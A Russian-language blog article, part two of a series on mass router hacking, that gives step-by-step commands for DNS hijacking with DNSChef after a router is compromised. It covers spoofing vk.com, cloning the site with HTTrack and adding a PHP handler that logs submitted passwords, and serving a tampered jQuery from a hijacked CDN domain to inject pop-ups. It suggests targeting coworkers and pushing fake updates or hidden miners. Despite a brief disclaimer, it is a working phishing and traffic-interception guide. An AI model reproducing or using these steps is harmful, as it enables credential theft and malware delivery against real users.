💀Массовый взлом роутеров. Часть 2.

18.01.2018

Продолжим статью с роутерами. В предыдущей статье мы получили понимание о уязвимостях и проблемах стандартных прошивок. В этой статье посмотрим, что можно с этим сделать.

Первая часть цикла статей.

Массовый взлом роутеров. Часть 2.
Массовый взлом роутеров. Часть 2.

А можно сделать действительно многое, но вся зависит от ваших знаний и умений.В статье будут основы и азы, все остальное можно найти или придумать самому.

Заранее предупреждаю, что вмешиваюсь в работу чужой сети вы можете понести ответственность. Все материалы предоставляются исключительно в ознакомительных целях. Помните и думайте, перед там, как что-то делать.

Установка и запуск DNSChef

После получения доступа к роутеру есть смысл подумать о подмене DNS. Для этого можно воспользоваться разнообразными инструментами. Оптимальные вариант DNSChef, которые можно запустить, как на отдельном VDS, так и на Kali Linux. В последнем варианте утилита установлена по умолчанию.

Команды для установки DNSChef для Убунту:

sudo apt-get install python-ipy
sudo pip install dnslib
git clone https://github.com/iphelix/dnschef.git
unzip dnschef*
cd dnschef*

Проверить работоспособность можно с помощью команды:

python dnschef.py
dnschef
dnschef

После установки и запуска можно переходить к функционалу. С помощью команды мы можем, например, подменивать сайты или слушать трафик. Это полезно для дальнейшей атаки, так как можно понять, какие сайты посещает пользователь и основываясь на этом – можно сделать фейк.

Для запуска подмены сайта необходимо запустить такую команду:

python dnschef.py -i IP_DNS_Прокси --fakeip IP_сервера --fakedomains vk.com

Для монитора трафика можно использовать этот способ. Если поставить команду nohup, а после команды символ &; это приведёт к тому, что после закрытия терминала процесс продолжит свою работу в фоне:

sudo nohup dnschef -i IP_вашего_DNS_прокси --logfile=/root/dns.log &
Просмотр сайтов пользователя
Просмотр сайтов пользователя

Смотреть данные с файла удобно в таком формате:

cat /root/dns.log

Запретить доступ к интернету можно с помощью команды:

sudo nohup dnschef -i IP_вашего_DNS_прокси --fakeip 127.0.0.1 --logfile=/root/dns.log &

Указываем DNS в роутере

После этого нужно добавить DNS сервер в роутер. Как добавить DNS сервер в роутер можно посмотреть в сети. Как правило, можно зайти и добавит IP на интуитивном уровне.

Изменения в роутере
Изменения в роутере

Что можно сделать?

Можно, например, собрать базу всех часто посещаемых сайтов у сотрудников или коллег и заменит их на что-то полезное: мотивацию к действию, картинку или какой-то вирус. Все на ваше желание и усмотрение. Я хочу только показать, что, если знать, какие сайты посещает жертва, и добавить немного социальной инженерии можно с высокой вероятность перехватить пароли и загрузить фейковое обновление.

Можно воспользоваться любым сервисом для локальных компьютеров или воспользоваться бесплатной утилитой Vesta CP. После создания и запуска виртуального хоста и соответствующей команды для замены в DNSChef:

python dnschef.py -i IP_DNS_Прокси --fakeip IP_сервера --fakedomains vk.com

Как получить пароли с сайта?

Немного сложнее, но просто. Для создания хорошего фейка нужно воспользоваться утилитой HTTrack. Более детально описывать не буду, так и так понятно, что можно сделать. Еще раз обращаю внимание на то, что нужно проводить «развекду». Так вы будете знать точно, какие сайты посещает целевой пользователь.

На примере сайта vk.com необходимо выполнить такую команду:

httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/admin/web/vk.com/public_html"

После завершения у вас будет полная копия сайта в папке vk.com. Далее нам необходимо заниматься обработкой событий после регистрации. Такими нехитрыми действиями пароли отправляться нам в файл. Это можно сделать с помощью такого варианта.

Нужно создать обработчик в корне каталога сайта с таким кодом c названием good.php:

$file = 'login.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);

После этого необходимо найти в коде главной страницы такую строки и добавить свой обработчик. Вместо ссылки указываем good.php.

Изменение обработчика событий
Изменение обработчика событий

После этого сохраняем и перезагружаем. После ввода данных они будут отображаться в нашем файле login.txt. Для удобного мониторинга можно воспользоваться командой. Данные будут отображаться в формате массива данных:

cat hack.txt

Я думаю, что таким нехитрым и не сложным способом можно сделать фейк практически любого сайта. Если дополнительно использовать навыки социальной инженерии, то можно достичь высокой вероятности ввода данных.

Данный метод не подходит для HSTS. Для работы с такими соединениями можно воспользоваться утилитами SSLStrip и dns2proxy.

Что можно придумать еще?

На самом деле вариантов может быть куча: обновления, плагины, приложения и т.д.. Когда у нас есть доступ и весь трафик контролируется, то можно добавлять что угодно. Можно использовать еще фейковые обновление или установка дополнительных плагинов, таких как BeEF. Рассмотрим, как можно еще отображать рекламу.

Для работы с рекламой используются разные CDN (Content Delivery Network или Content Distribution Network). CDN способствует увеличению скорости загрузки интернет-пользователями аудио-, видео-, программного, игрового и других видов цифрового содержимого в точках присутствия сети CDN. Такую сетевую инфраструктуру можно реализовать в разных вариантах. Рассмотрим, как заражать сайты всплывающей рекламой, если сайт использует CDN jQuery.

Для этого нужно поднять сайт на локальном сервере code.jquery.com. После этого нужно изменить в коде js файле то, что нам нужно. Выгрузить можно по ссылке http://code.jquery.com/jquery-1.9.1.js.

Для добавления простой рекламы достаточно добавить такую конструкцию в конце файла:

$(function() {
   $( "body" ).dialog({
   height: 500,
   width: 550,
   modal: true,
   autoOpen: false
 });
   setTimeout(function () {
       $("body").dialog("open");
   }, 5000)
});

После добавления этого кода в файл, на сайте будет добавляться всплывающая реклама через 5 секунд. В интернете можно найти разнообразные мануалы, как создавать такие страницы. Вот пример с исходным кодом.

Пример всплывающего окна
Пример всплывающего окна

Чтобы закрыть максимальное количество вариантов, которые используют другие сайты в качестве CDN нужно воспользоваться командой:

python dnschef.py -i IP_DNS_Прокси --fakeip IP_сервера --fakedomains vk.com= code.jquery.com, jquery.com,www.code.jquery.com

Заключение

Это более несколько примеров для дальнейшей оптимизации и использования. Можно доработать каждый способ в зависимости от целей. Можно получить полное управление ПК или доставить скрытый майнер. Поэтому можете дальше сами дорабатывать и использовать.

Подписывайся на канал и ставь лайки, чтобы скорее увидеть новые интересные статьи!